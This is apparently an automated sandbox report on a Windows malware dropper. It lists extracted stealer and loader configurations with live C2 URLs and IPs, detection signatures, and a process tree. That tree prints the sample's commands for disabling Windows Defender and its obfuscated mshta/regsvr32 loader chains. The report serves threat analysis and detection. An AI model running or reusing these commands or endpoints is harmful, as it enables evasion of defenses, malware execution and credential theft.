Analysis
-
max time kernel
22s -
max time network
154s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
23/11/2021, 00:32
Static task
static1
Behavioral task
behavioral1
Sample
9a5b2df52152e87d492bdea584da57b2.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
9a5b2df52152e87d492bdea584da57b2.exe
Resource
win10-en-20211014
General
-
Target
9a5b2df52152e87d492bdea584da57b2.exe
-
Size
13.9MB
-
MD5
9a5b2df52152e87d492bdea584da57b2
-
SHA1
195f74fb957837638b0b2b8c16a061e1d001cca2
-
SHA256
01e9a86fc7574104e12afa4836b39fca625d7d2bdcf04cf52dc0217b98497223
-
SHA512
5ce1207dffba89cd29e7a72556497c36047bf0fa8e62aadec33d195c47f05a2dd546d598b77797486bd577d64d31f99293d199a566aad6b6f6a12391c13bfe84
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
amadey
2.82
185.215.113.45/g4MbvE/index.php
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
vidar
48.6
933
https://mastodon.online/@valhalla
https://koyu.space/@valhalla
-
profile_id
933
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 2412 rundll32.exe 71 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3216 2412 rundll32.exe 71 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/3020-287-0x0000000000418F06-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral1/files/0x00050000000132ee-135.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/2656-381-0x0000000000400000-0x0000000002BAB000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00050000000132e2-63.dat aspack_v212_v242 behavioral1/files/0x00050000000132e2-64.dat aspack_v212_v242 behavioral1/files/0x0006000000013209-65.dat aspack_v212_v242 behavioral1/files/0x0006000000013209-66.dat aspack_v212_v242 behavioral1/files/0x00050000000132e6-69.dat aspack_v212_v242 behavioral1/files/0x00050000000132e6-70.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 588 setup_install.exe 896 Sat223a93262ea5e8d3.exe 2020 Sat221d8ea09eebfe.exe 464 Sat22c086fc4abe36.exe 1696 Sat224bdd8c5c15.exe 1972 Sat229cc46dc392f202c.exe 1156 Sat2237fea859fe4.exe 1308 Sat22d3494af9.exe 1076 Sat22bb7b5b45bcfb.exe 1824 Sat2232f60f4b1f89dd2.exe 1548 conhost.exe 1400 Sat22e3a2307e6bf2328.exe 1108 Sat222e78780cd.exe 1936 Sat2232f60f4b1f89dd2.tmp 984 Sat2276be40cc7.exe 1376 Sat223a93262ea5e8d3.tmp 2052 Sat2232f60f4b1f89dd2.exe 2092 Sat2232f60f4b1f89dd2.tmp 2284 tkools.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Sat221d8ea09eebfe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Sat221d8ea09eebfe.exe -
Loads dropped DLL 64 IoCs
pid Process 480 9a5b2df52152e87d492bdea584da57b2.exe 480 9a5b2df52152e87d492bdea584da57b2.exe 480 9a5b2df52152e87d492bdea584da57b2.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 588 setup_install.exe 1268 cmd.exe 1616 cmd.exe 840 cmd.exe 1736 cmd.exe 1936 Sat2232f60f4b1f89dd2.tmp 1936 Sat2232f60f4b1f89dd2.tmp 1900 cmd.exe 304 7281087.exe 1644 cmd.exe 1644 cmd.exe 896 Sat223a93262ea5e8d3.exe 896 Sat223a93262ea5e8d3.exe 464 Sat22c086fc4abe36.exe 464 Sat22c086fc4abe36.exe 1156 Sat2237fea859fe4.exe 1156 Sat2237fea859fe4.exe 1972 Sat229cc46dc392f202c.exe 1972 Sat229cc46dc392f202c.exe 2012 cmd.exe 2020 Sat221d8ea09eebfe.exe 2020 Sat221d8ea09eebfe.exe 1076 Sat22bb7b5b45bcfb.exe 1076 Sat22bb7b5b45bcfb.exe 1572 cmd.exe 1572 cmd.exe 1972 Sat229cc46dc392f202c.exe 1824 Sat2232f60f4b1f89dd2.exe 1824 Sat2232f60f4b1f89dd2.exe 1592 cmd.exe 1400 Sat22e3a2307e6bf2328.exe 1400 Sat22e3a2307e6bf2328.exe 1108 Sat222e78780cd.exe 1108 Sat222e78780cd.exe 1444 cmd.exe 1444 cmd.exe 1548 conhost.exe 1548 conhost.exe 1824 Sat2232f60f4b1f89dd2.exe 984 Sat2276be40cc7.exe 984 Sat2276be40cc7.exe 896 Sat223a93262ea5e8d3.exe 1936 Sat2232f60f4b1f89dd2.tmp 1936 Sat2232f60f4b1f89dd2.tmp 1936 Sat2232f60f4b1f89dd2.tmp 1936 Sat2232f60f4b1f89dd2.tmp 2052 Sat2232f60f4b1f89dd2.exe 2052 Sat2232f60f4b1f89dd2.exe 2052 Sat2232f60f4b1f89dd2.exe 2092 Sat2232f60f4b1f89dd2.tmp 2092 Sat2232f60f4b1f89dd2.tmp 2092 Sat2232f60f4b1f89dd2.tmp 2020 Sat221d8ea09eebfe.exe 2284 tkools.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Sat221d8ea09eebfe.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2020 Sat221d8ea09eebfe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2812 schtasks.exe 2216 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 1996 taskkill.exe 2388 taskkill.exe 2144 taskkill.exe 1720 taskkill.exe 2408 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sat222e78780cd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sat222e78780cd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2020 Sat221d8ea09eebfe.exe 1528 powershell.exe 1144 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 1108 Sat222e78780cd.exe Token: SeAssignPrimaryTokenPrivilege 1108 Sat222e78780cd.exe Token: SeLockMemoryPrivilege 1108 Sat222e78780cd.exe Token: SeIncreaseQuotaPrivilege 1108 Sat222e78780cd.exe Token: SeMachineAccountPrivilege 1108 Sat222e78780cd.exe Token: SeTcbPrivilege 1108 Sat222e78780cd.exe Token: SeSecurityPrivilege 1108 Sat222e78780cd.exe Token: SeTakeOwnershipPrivilege 1108 Sat222e78780cd.exe Token: SeLoadDriverPrivilege 1108 Sat222e78780cd.exe Token: SeSystemProfilePrivilege 1108 Sat222e78780cd.exe Token: SeSystemtimePrivilege 1108 Sat222e78780cd.exe Token: SeProfSingleProcessPrivilege 1108 Sat222e78780cd.exe Token: SeIncBasePriorityPrivilege 1108 Sat222e78780cd.exe Token: SeCreatePagefilePrivilege 1108 Sat222e78780cd.exe Token: SeCreatePermanentPrivilege 1108 Sat222e78780cd.exe Token: SeBackupPrivilege 1108 Sat222e78780cd.exe Token: SeRestorePrivilege 1108 Sat222e78780cd.exe Token: SeShutdownPrivilege 1108 Sat222e78780cd.exe Token: SeDebugPrivilege 1108 Sat222e78780cd.exe Token: SeAuditPrivilege 1108 Sat222e78780cd.exe Token: SeSystemEnvironmentPrivilege 1108 Sat222e78780cd.exe Token: SeChangeNotifyPrivilege 1108 Sat222e78780cd.exe Token: SeRemoteShutdownPrivilege 1108 Sat222e78780cd.exe Token: SeUndockPrivilege 1108 Sat222e78780cd.exe Token: SeSyncAgentPrivilege 1108 Sat222e78780cd.exe Token: SeEnableDelegationPrivilege 1108 Sat222e78780cd.exe Token: SeManageVolumePrivilege 1108 Sat222e78780cd.exe Token: SeImpersonatePrivilege 1108 Sat222e78780cd.exe Token: SeCreateGlobalPrivilege 1108 Sat222e78780cd.exe Token: 31 1108 Sat222e78780cd.exe Token: 32 1108 Sat222e78780cd.exe Token: 33 1108 Sat222e78780cd.exe Token: 34 1108 Sat222e78780cd.exe Token: 35 1108 Sat222e78780cd.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 1144 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 480 wrote to memory of 588 480 9a5b2df52152e87d492bdea584da57b2.exe 28 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 2008 588 setup_install.exe 31 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1488 588 setup_install.exe 30 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 588 wrote to memory of 1268 588 setup_install.exe 54 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 1488 wrote to memory of 1144 1488 cmd.exe 53 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 2008 wrote to memory of 1528 2008 cmd.exe 32 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 1616 588 setup_install.exe 52 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 840 588 setup_install.exe 33 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1900 588 setup_install.exe 48 PID 588 wrote to memory of 1736 588 setup_install.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a5b2df52152e87d492bdea584da57b2.exe"C:\Users\Admin\AppData\Local\Temp\9a5b2df52152e87d492bdea584da57b2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat22c086fc4abe36.exe3⤵
- Loads dropped DLL
PID:840 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22c086fc4abe36.exeSat22c086fc4abe36.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:464 -
C:\Users\Admin\AppData\Roaming\6929300.exe"C:\Users\Admin\AppData\Roaming\6929300.exe"5⤵PID:3032
-
-
C:\Users\Admin\AppData\Roaming\7281087.exe"C:\Users\Admin\AppData\Roaming\7281087.exe"5⤵
- Loads dropped DLL
PID:304 -
C:\Users\Admin\AppData\Roaming\27413463\2741273727412737.exe"C:\Users\Admin\AppData\Roaming\27413463\2741273727412737.exe"6⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Roaming\1652085.exe"C:\Users\Admin\AppData\Roaming\1652085.exe"5⤵PID:1568
-
-
C:\Users\Admin\AppData\Roaming\8073715.exe"C:\Users\Admin\AppData\Roaming\8073715.exe"5⤵PID:2292
-
-
C:\Users\Admin\AppData\Roaming\6454345.exe"C:\Users\Admin\AppData\Roaming\6454345.exe"5⤵PID:2496
-
-
C:\Users\Admin\AppData\Roaming\4551210.exe"C:\Users\Admin\AppData\Roaming\4551210.exe"5⤵PID:1072
-
C:\Users\Admin\AppData\Roaming\5920019.exe"C:\Users\Admin\AppData\Roaming\5920019.exe"6⤵PID:2380
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Roaming\5920019.exe"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if """" == """" for %p In ( ""C:\Users\Admin\AppData\Roaming\5920019.exe"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )7⤵PID:1776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Roaming\5920019.exe" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "" == "" for %p In ( "C:\Users\Admin\AppData\Roaming\5920019.exe" ) do taskkill /f /iM "%~Nxp"8⤵PID:464
-
C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT9⤵PID:1256
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if ""/PvWRgT~XF843YaMCVQMy4mT"" == """" for %p In ( ""C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )10⤵PID:2724
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "/PvWRgT~XF843YaMCVQMy4mT" == "" for %p In ( "C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE" ) do taskkill /f /iM "%~Nxp"11⤵PID:3356
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: CLoSe( crEaTeoBjECt ("Wscript.sHELl" ). run ( "C:\Windows\system32\cmd.exe /Q /R eChO | SeT /p = ""MZ"" > UXzDKCI.vL & Copy /B /y UXZDKCI.VL + BvNdvRB2.Vn+ SnmqF.N ..\8Kw4W.V~W & sTarT regsvr32 -S ..\8kw4W.V~W -u & deL /q * " , 0 , TRUE ) )10⤵PID:4032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /R eChO | SeT /p = "MZ" > UXzDKCI.vL &Copy /B /y UXZDKCI.VL + BvNdvRB2.Vn+ SnmqF.N ..\8Kw4W.V~W & sTarT regsvr32 -S ..\8kw4W.V~W -u & deL /q *11⤵PID:3132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>UXzDKCI.vL"12⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eChO "12⤵PID:2136
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -S ..\8kw4W.V~W -u12⤵PID:2504
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "5920019.exe"9⤵
- Kills process with taskkill
PID:1720
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\3957515.exe"C:\Users\Admin\AppData\Roaming\3957515.exe"6⤵PID:2732
-
C:\Users\Admin\AppData\Roaming\3957515.exe"C:\Users\Admin\AppData\Roaming\3957515.exe"7⤵PID:3224
-
-
-
-
C:\Users\Admin\AppData\Roaming\4521525.exe"C:\Users\Admin\AppData\Roaming\4521525.exe"5⤵PID:768
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2237fea859fe4.exe3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2237fea859fe4.exeSat2237fea859fe4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat220d71535d812f8d.exe /mixtwo3⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat229cc46dc392f202c.exe3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exeSat229cc46dc392f202c.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exe" -u5⤵PID:1548
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2276be40cc7.exe3⤵
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exeSat2276be40cc7.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:984 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exe"5⤵PID:2668
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat222e78780cd.exe3⤵
- Loads dropped DLL
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat222e78780cd.exeSat222e78780cd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:2388
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat22c52b52ae9743c47.exe3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat22e3a2307e6bf2328.exe3⤵
- Loads dropped DLL
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22e3a2307e6bf2328.exeSat22e3a2307e6bf2328.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2232f60f4b1f89dd2.exe3⤵
- Loads dropped DLL
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exeSat2232f60f4b1f89dd2.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\is-LPFDN.tmp\Sat2232f60f4b1f89dd2.tmp"C:\Users\Admin\AppData\Local\Temp\is-LPFDN.tmp\Sat2232f60f4b1f89dd2.tmp" /SL5="$70152,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe" /SILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\is-1TB16.tmp\Sat2232f60f4b1f89dd2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1TB16.tmp\Sat2232f60f4b1f89dd2.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\is-KHSU3.tmp\winhostdll.exe"C:\Users\Admin\AppData\Local\Temp\is-KHSU3.tmp\winhostdll.exe" ss18⤵PID:2636
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat22bb7b5b45bcfb.exe3⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exeSat22bb7b5b45bcfb.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exeC:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exe5⤵PID:3020
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat224bdd8c5c15.exe3⤵
- Loads dropped DLL
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat22d3494af9.exe3⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22d3494af9.exeSat22d3494af9.exe4⤵
- Executes dropped EXE
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat221d8ea09eebfe.exe3⤵
- Loads dropped DLL
PID:1616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat223a93262ea5e8d3.exe3⤵
- Loads dropped DLL
PID:1268
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat223a93262ea5e8d3.exeSat223a93262ea5e8d3.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:896 -
